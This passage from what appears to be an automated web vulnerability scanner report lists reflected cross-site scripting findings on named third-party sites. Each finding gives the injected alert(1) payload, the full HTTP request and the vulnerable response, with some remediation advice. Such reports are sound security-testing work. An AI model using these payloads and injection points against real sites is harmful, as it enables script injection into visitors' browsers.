Path:   /adscgen/d_layer.php

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb6b3'%3balert(1)//069defae92d was submitted in the site parameter. This input was echoed as cb6b3';alert(1)//069defae92d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=918801&lang=&from_node=28067&site=8cb6b3'%3balert(1)//069defae92d HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.kaboodle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us; linkjumptest=1; LP=1316276716

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:39:00 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b101.dl
Content-Type: text/html
Content-Length: 12193

var DL_HideSelects = true;
var DL_HideObjects = false;
var DL_HideIframes = false;
var DL_Banner; // Will be bound to the DIV element representing the layer
var DL_ScrollState = 0;
var DL_width;
var D
...[SNIP]...

   DL_SurveyClickthru = 1;
}
   DL_Close(false);

window.top.location.href='http://amch.questionmarket.com/surveyf/?survey_server=survey.questionmarket.com&survey_num=918801&from_node=28067&site=8cb6b3';alert(1)//069defae92d&frame=&lang=&dl_logo=&invite=no&link='+escape(window.location.href)+'&orig='+escape(window.location.href);
}

function DL_Close(adscout) {
   if (typeof adscout == 'undefined' || adscout == true) {
       DL
...[SNIP]...

4.105. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [lang parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/dynamiclink.js.php

Issue detail

The value of the lang request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c196d'-alert(1)-'13129391a78 was submitted in the lang parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adscgen/dynamiclink.js.php?sub=amch&type=d_layer&survey_num=918801&lang=c196d'-alert(1)-'13129391a78&from_node=28067&site=8 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.kaboodle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us; linkjumptest=1

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:39:07 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b101.dl
Set-Cookie: LP=1316277547; expires=Wed, 21 Sep 2011 20:39:07 GMT; path=/; domain=.questionmarket.com
Content-Length: 2445
Content-Type: text/html

(function(){
var d=document,w=window,dle;

function ff(){
var p=w.parent,r;

while (p != top) {
try {
if (p.location.host == w.location.host)
   r = p.document.referrer;
} catch (e) { }

p = p.paren
...[SNIP]...
}
df=biggestframe;
}
d=df.document;
if (!df.DL_already_ran){
dle=d.createElement('script');
dle.src='http://amch.questionmarket.com/adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=918801&lang=c196d'-alert(1)-'13129391a78&from_node=28067&site=8';
try {
   if (dle.src.search('d_layer') && (window['$WLXRmAd'] || (window.parent && window.parent['$WLXRmAd']))) {
       dle.src=dle.src.replace('d_layer','h_layer');
   }
} catch (e)
...[SNIP]...

4.106. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/dynamiclink.js.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c194e'-alert(1)-'248affad422 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adscgen/dynamiclink.js.php?sub=amch&type=d_layer&survey_num=918801&lang=&from_node=28067&site=8&c194e'-alert(1)-'248affad422=1 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.kaboodle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us; linkjumptest=1

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:40:24 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b201.dl
Set-Cookie: LP=1316277624; expires=Wed, 21 Sep 2011 20:40:24 GMT; path=/; domain=.questionmarket.com
Content-Length: 2448
Content-Type: text/html

(function(){
var d=document,w=window,dle;

function ff(){
var p=w.parent,r;

while (p != top) {
try {
if (p.location.host == w.location.host)
   r = p.document.referrer;
} catch (e) { }

p = p.paren
...[SNIP]...

d=df.document;
if (!df.DL_already_ran){
dle=d.createElement('script');
dle.src='http://amch.questionmarket.com/adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=918801&lang=&from_node=28067&site=8&c194e'-alert(1)-'248affad422=1';
try {
   if (dle.src.search('d_layer') && (window['$WLXRmAd'] || (window.parent && window.parent['$WLXRmAd']))) {
       dle.src=dle.src.replace('d_layer','h_layer');
   }
} catch (e) {}
dle.type="text/jav
...[SNIP]...

4.107. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/dynamiclink.js.php

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1e7bf'-alert(1)-'5f3356cd700 was submitted in the site parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adscgen/dynamiclink.js.php?sub=amch&type=d_layer&survey_num=918801&lang=&from_node=28067&site=81e7bf'-alert(1)-'5f3356cd700 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.kaboodle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us; linkjumptest=1

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:39:34 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b102.dl
Set-Cookie: LP=1316277574; expires=Wed, 21 Sep 2011 20:39:34 GMT; path=/; domain=.questionmarket.com
Content-Length: 2447
Content-Type: text/html

(function(){
var d=document,w=window,dle;

function ff(){
var p=w.parent,r;

while (p != top) {
try {
if (p.location.host == w.location.host)
   r = p.document.referrer;
} catch (e) { }

p = p.paren
...[SNIP]...
}
d=df.document;
if (!df.DL_already_ran){
dle=d.createElement('script');
dle.src='http://amch.questionmarket.com/adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=918801&lang=&from_node=28067&site=81e7bf'-alert(1)-'5f3356cd700';
try {
   if (dle.src.search('d_layer') && (window['$WLXRmAd'] || (window.parent && window.parent['$WLXRmAd']))) {
       dle.src=dle.src.replace('d_layer','h_layer');
   }
} catch (e) {}
dle.type="text/javas
...[SNIP]...

4.108. http://api.uproxx.com/ulink/feed [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.uproxx.com
Path:   /ulink/feed

Issue detail

The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload 9e64b<img%20src%3da%20onerror%3dalert(1)>fb9c84b95b7 was submitted in the pid parameter. This input was echoed as 9e64b<img src=a onerror=alert(1)>fb9c84b95b7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ulink/feed?pid=1639e64b<img%20src%3da%20onerror%3dalert(1)>fb9c84b95b7&limit=12&c_cats=3,15,17,&uw_nsfw=false&format=json HTTP/1.1
Host: api.uproxx.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:14:57 GMT
Server: Apache
Connection: close
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 5055

UPROXXJSON(
[{"category":"TV \/ Movie News","content_title":"Megan Fox Gains Weight, Talks Future","image_url":"http:\/\/ua.uproxxcdn.com\/ejYFCvnvi4xlveI.jpg","content_clicks":"344","source_title":"Moviefone","source_url":"http:\/\/moviefone.com","source_favicon":"http:\/\/www.google.com\/s2\/favicons?domain=moviefone.com","content_link":"http:\/\/widget.uproxx.com\/t\/1a107970o1639e64b<img src=a onerror=alert(1)>fb9c84b95b7"},{"category":"Web Culture","content_title":"UPROXX Interview With Charlie Day","image_url":"http:\/\/ua.uproxxcdn.com\/6PxEor9uKEjF6Lm.jpg","content_clicks":"10982","source_title":"Uproxx","source_ur
...[SNIP]...

4.109. http://api.zap2it.com/tvlistings/zcConnector.jsp [aid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.zap2it.com
Path:   /tvlistings/zcConnector.jsp

Issue detail

The value of the aid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 180cc"-alert(1)-"5baa4485817 was submitted in the aid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tvlistings/zcConnector.jsp?ap=ptg&v=2&aid=f3j180cc"-alert(1)-"5baa4485817&zip=98101&stnlt=10387,10520,10518 HTTP/1.1
Host: api.zap2it.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Cteonnt-Length: 483
Content-Length: 483
Cache-Control: max-age=900
Expires: Sat, 17 Sep 2011 16:38:38 GMT
Date: Sat, 17 Sep 2011 16:23:38 GMT
Connection: close
Vary: Accept-Encoding


var validRequest = true;

var server = "http://api.zap2it.com";
var requestParams = "ap=ptg&v=2&aid=f3j180cc"-alert(1)-"5baa4485817&zip=98101&stnlt=10387,10520,10518";
var action;


action = "/tvlistings/ZCPrimeTimeGrid.do?";


if(requestParams!="" && validRequest) {
document.write("<scr" + "ipt ");
document.write("type='t
...[SNIP]...

4.110. http://api.zap2it.com/tvlistings/zcConnector.jsp [ap parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.zap2it.com
Path:   /tvlistings/zcConnector.jsp

Issue detail

The value of the ap request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2c76"-alert(1)-"73c548fbb0a was submitted in the ap parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tvlistings/zcConnector.jsp?ap=ptge2c76"-alert(1)-"73c548fbb0a&v=2&aid=f3j&zip=98101&stnlt=10387,10520,10518 HTTP/1.1
Host: api.zap2it.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Cteonnt-Length: 459
Content-Length: 459
Cache-Control: max-age=900
Expires: Sat, 17 Sep 2011 16:38:36 GMT
Date: Sat, 17 Sep 2011 16:23:36 GMT
Connection: close
Vary: Accept-Encoding


var validRequest = true;

var server = "http://api.zap2it.com";
var requestParams = "ap=ptge2c76"-alert(1)-"73c548fbb0a&v=2&aid=f3j&zip=98101&stnlt=10387,10520,10518";
var action;

validRequest = false;

if(requestParams!="" && validRequest) {
document.write("<scr" + "ipt ");
document.write("type='text/javascri
...[SNIP]...

4.111. http://api.zap2it.com/tvlistings/zcConnector.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.zap2it.com
Path:   /tvlistings/zcConnector.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c254f"-alert(1)-"d4b6e154fab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tvlistings/zcConnector.jsp?ap=ptg&v=2&aid=f3j&zip=98101&stnlt=10387,10520,10518&c254f"-alert(1)-"d4b6e154fab=1 HTTP/1.1
Host: api.zap2it.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Cteonnt-Length: 486
Content-Length: 486
Cache-Control: max-age=900
Expires: Sat, 17 Sep 2011 16:38:40 GMT
Date: Sat, 17 Sep 2011 16:23:40 GMT
Connection: close
Vary: Accept-Encoding


var validRequest = true;

var server = "http://api.zap2it.com";
var requestParams = "ap=ptg&v=2&aid=f3j&zip=98101&stnlt=10387,10520,10518&c254f"-alert(1)-"d4b6e154fab=1";
var action;


action = "/tvlistings/ZCPrimeTimeGrid.do?";


if(requestParams!="" && validRequest) {
document.write("<scr" + "ipt ");
document.write("type='text/javascript' src='" + server
...[SNIP]...

4.112. http://api.zap2it.com/tvlistings/zcConnector.jsp [stnlt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.zap2it.com
Path:   /tvlistings/zcConnector.jsp

Issue detail

The value of the stnlt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9f99"-alert(1)-"c1b02f4a4e4 was submitted in the stnlt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tvlistings/zcConnector.jsp?ap=ptg&v=2&aid=f3j&zip=98101&stnlt=10387,10520,10518a9f99"-alert(1)-"c1b02f4a4e4 HTTP/1.1
Host: api.zap2it.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Cteonnt-Length: 483
Content-Length: 483
Cache-Control: max-age=900
Expires: Sat, 17 Sep 2011 16:38:39 GMT
Date: Sat, 17 Sep 2011 16:23:39 GMT
Connection: close
Vary: Accept-Encoding


var validRequest = true;

var server = "http://api.zap2it.com";
var requestParams = "ap=ptg&v=2&aid=f3j&zip=98101&stnlt=10387,10520,10518a9f99"-alert(1)-"c1b02f4a4e4";
var action;


action = "/tvlistings/ZCPrimeTimeGrid.do?";


if(requestParams!="" && validRequest) {
document.write("<scr" + "ipt ");
document.write("type='text/javascript' src='" + server +
...[SNIP]...

4.113. http://api.zap2it.com/tvlistings/zcConnector.jsp [v parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.zap2it.com
Path:   /tvlistings/zcConnector.jsp

Issue detail

The value of the v request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad912"-alert(1)-"5380e65f37c was submitted in the v parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tvlistings/zcConnector.jsp?ap=ptg&v=2ad912"-alert(1)-"5380e65f37c&aid=f3j&zip=98101&stnlt=10387,10520,10518 HTTP/1.1
Host: api.zap2it.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Cteonnt-Length: 483
Content-Length: 483
Cache-Control: max-age=900
Expires: Sat, 17 Sep 2011 16:38:37 GMT
Date: Sat, 17 Sep 2011 16:23:37 GMT
Connection: close
Vary: Accept-Encoding


var validRequest = true;

var server = "http://api.zap2it.com";
var requestParams = "ap=ptg&v=2ad912"-alert(1)-"5380e65f37c&aid=f3j&zip=98101&stnlt=10387,10520,10518";
var action;


action = "/tvlistings/ZCPrimeTimeGrid.do?";


if(requestParams!="" && validRequest) {
document.write("<scr" + "ipt ");
document.write(
...[SNIP]...

4.114. http://api.zap2it.com/tvlistings/zcConnector.jsp [zip parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.zap2it.com
Path:   /tvlistings/zcConnector.jsp

Issue detail

The value of the zip request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7182"-alert(1)-"14f2f041e46 was submitted in the zip parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tvlistings/zcConnector.jsp?ap=ptg&v=2&aid=f3j&zip=98101b7182"-alert(1)-"14f2f041e46&stnlt=10387,10520,10518 HTTP/1.1
Host: api.zap2it.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Cteonnt-Length: 483
Content-Length: 483
Cache-Control: max-age=900
Expires: Sat, 17 Sep 2011 16:38:38 GMT
Date: Sat, 17 Sep 2011 16:23:38 GMT
Connection: close
Vary: Accept-Encoding


var validRequest = true;

var server = "http://api.zap2it.com";
var requestParams = "ap=ptg&v=2&aid=f3j&zip=98101b7182"-alert(1)-"14f2f041e46&stnlt=10387,10520,10518";
var action;


action = "/tvlistings/ZCPrimeTimeGrid.do?";


if(requestParams!="" && validRequest) {
document.write("<scr" + "ipt ");
document.write("type='text/javasc
...[SNIP]...

4.115. http://b.scorecardresearch.com/beacon.js [c1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 49914<script>alert(1)</script>7a5c26187c was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=249914<script>alert(1)</script>7a5c26187c&c2=6035786&c3=6035786&c4=&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sat, 01 Oct 2011 16:28:32 GMT
Date: Sat, 17 Sep 2011 16:28:32 GMT
Content-Length: 1240
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"249914<script>alert(1)</script>7a5c26187c", c2:"6035786", c3:"6035786", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



4.116. http://b.scorecardresearch.com/beacon.js [c10 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload e4c54<script>alert(1)</script>6027ce286c9 was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=13&c4=16122&c5=44988&c6=&c10=237868e4c54<script>alert(1)</script>6027ce286c9&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/flashtalking/ftlocal.html?ifsrc=http%3A%2F%2Fa.flashtalking.com%2Fxre%2F18%2F189583%2F237666%2Fjs%2Fj-189583-237666.js&click=http://mpc.mxptint.net/1S1S758D1EF6S0S9FSA2DS1S12CSFAS7CSB26_27703FDE_10878AA%3f&ftx=&fty=&ftadz=&ftscw=&cachebuster=802568.8005145639%26ftguid%3D1343AC00FD7B0F%26ftcfid%3D237666001%26ftoob%3D%26ftsg%3Dadg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sat, 01 Oct 2011 16:54:19 GMT
Date: Sat, 17 Sep 2011 16:54:19 GMT
Content-Length: 1249
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
h-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113", c3:"13", c4:"16122", c5:"44988", c6:"", c10:"237868e4c54<script>alert(1)</script>6027ce286c9", c15:"", c16:"", r:""});



4.117. http://b.scorecardresearch.com/beacon.js [c15 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 8b174<script>alert(1)</script>253c92feb83 was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=&c6=&c15=8b174<script>alert(1)</script>253c92feb83&tm=799493 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sat, 01 Oct 2011 16:36:32 GMT
Date: Sat, 17 Sep 2011 16:36:32 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
